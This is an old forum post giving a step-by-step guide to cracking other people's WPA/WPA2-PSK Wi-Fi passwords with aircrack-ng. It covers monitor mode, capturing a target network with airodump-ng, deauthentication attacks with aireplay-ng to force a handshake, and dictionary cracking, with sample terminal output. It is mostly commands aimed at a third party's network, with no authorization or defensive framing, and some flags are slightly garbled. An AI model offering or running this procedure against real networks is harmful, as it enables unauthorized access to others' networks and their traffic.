HACKING WI-FI PASSWORD

**Admin** Sat Aug 08, 2009 12:56 pm

How To Crack Wireless Networks WPA psk/psk2

*Requirements
Linux OS ( almost any will work )
Aircrack-Ng Suite
Madwifi Driver ** search on google **
A Good Dictionary file

** If using backtrack or another live cd these things are probably already built in.

STARTING:

Alright before doing any of this make sure your network card is compatible with aircrack & madwifi! Some cards dont wake up after you put them in monitor mode.

Ok login as root and goto a terminal.
[root@localhost ~]# airmon-ngInterface Chipset Driver

wifi0 Atheros madwifi-ng

ath0 Atheros madwifi-ng VAP (parent: wifi0)

Now just put your card in monitor mode
[root@localhost ~]# airmon-ng stop ath0Interface Chipset Driver

wifi0 Atheros madwifi-ng

ath0 Atheros madwifi-ng VAP (parent: wifi0)

[root@localhost ~]# airmon-ng start wifi0

Interface Chipset Driver

wifi0 Atheros madwifi-ng

ath0 Atheros madwifi-ng VAP (monitor mode enabled)

now just

type: ifconfig ath0 up

type: iwconfig
[root@localhost ~]# iwconfig

lo no wireless extensions.eth0 no wireless extensions.

wifi0 no wireless extensions.

pan0 no wireless extensions.

: **:**:**:**:**:**

Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=1/1

Retry:off RTS thr:off Fragment thr:off

Encryption key:off

Power Management:off

Link Quality=0/70 Signal level=-93 dBm Noise level=-93 dBm

Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0

Tx excessive retries:0 Invalid misc:0 Missed beacon:0

ath0 IEEE 802.11g ESSID:”" Nickname:”"

Mode:Monitor Frequency:2.437 GHz Access Point

CAPTURING:

ok now you have to start capturing your targets network so first open a new terminal window.
airodump-ng ath0

This shows all the networks you can capture in your area. Find the network you want to crack that is wpa protected, and copy the bssid ( mac address )

**DIRECTIONS**

airodump-ng:

-c channel that your target is on

example: airodump-ng -c 6

-w The name you want to save the capture as

example: airodump-ng -c 6 -w wpapsk

example2: /root/wpapsk-01.cap

–bssid The bssid that you want to capture ( the one you copied )

example: airodump-ng -c 6 -w wpapsk –bssid **:**:**:**:**:**

ath0 the interface you are using

example: airodump-ng -c 6 -w wpapsk –bssid **:**:**:**:**:** ath0

**END OF DIRECTIONS**

Alright now type: airodump-ng -c XX -w whateveruwant –bssid **:**:**:**:**:** ath0
CH 6 ][ Elapsed: 2 mins ][ 2008-11-23 3:51BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

**:**:**:**:**:** 12 100 2495 7 0 6 54 WPA TKIP PSK BOBNET

BSSID STATION PWR Rate Lost Packets Probes

NOW WAIT untill a client connects to the network.

AIREPLAY:

Next your going to use aireplay to send attacks.

**DIRECTIONS**

aireplay-ng

xx= mine

**=targets

-0 5 This sends 5 attacks to the target

example: aireplay-ng -0 5

-a the target wireless networks bssid

example: aireplay-ng -0 5 -a **:**:**:**:**:**

-c your access point bssid ( remember iwconfig that i told you to leave open )

example: aireplay-ng -0 5 -a **:**:**:**:**:** -c xx:xx:xx:xx:xx:xx

ath0 The interface and your ready to go!

example:
aireplay-ng -0 5 -a **:**:**:**:**:** -c xx:xx:xx:xx:xx:xx ath0

** END OF DIRECTIONS **

CRACKING:

when your airodump finally shows this:

CH 6 ][ Elapsed: 2 mins ][ 2008-11-23 3:51 [WPA HANDSHAKE FOUND]

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

**:**:**:**:**:** 12 100 2495 7 0 6 54 WPA TKIP PSK ************

BSSID STATION PWR Rate Lost Packets Probes

Then you can now crack there network!

FIRST YOU NEED A DICTIONARY FILE

make sure you know the directory its in.

**DIRECTIONS**

aircrack-ng

[the directory not a command]

example: aircrack-ng /root/w.ethenamewas-01.cap

-w The dictionary file ( the whole directory ) and then run the command!!
[root@localhost ~]#aircrack-ng /root/w.ethenamewas-01.cap -w /usr/share/dict/linux.words

**END OF DIRECTIONS**

Once you run the command It should start cracking...
Aircrack-ng 1.0 rc1[00:00:02] 622 keys tested (303.68 k/s)

Current passphrase: abscision

Master Key : 38 1A FF 6F C1 D1 B5 EE D5 73 FC A7 48 54 4E 1E

2E A8 A1 55 BD E2 2E 36 63 49 C0 96 DF CA 7E 5A

Transcient Key : 6F A6 0D 93 46 F9 A2 6B AB 31 96 31 F9 C6 5F 51

83 91 86 59 30 A0 DB 95 43 5F D4 72 BA 5D BD B1

51 98 06 9B 7D E8 DD 4D AA 37 B3 E6 1F DF 1F 50

71 35 B9 2F 33 6F 89 1B E2 13 89 74 E5 E6 16 17

EAPOL HMAC : 68 B3 E9 AB 56 01 6C D8 A6 BE 4D B6 C2 0C 9D D0

THIS WILL ONLY WORK IF THE PASSWORD IS SOMEWHERE IN YOUR DICTIONARY!!

**This concludes my guide to crack wireless networks!!

Source:
http://hackingarticles.com/wpa-cracking/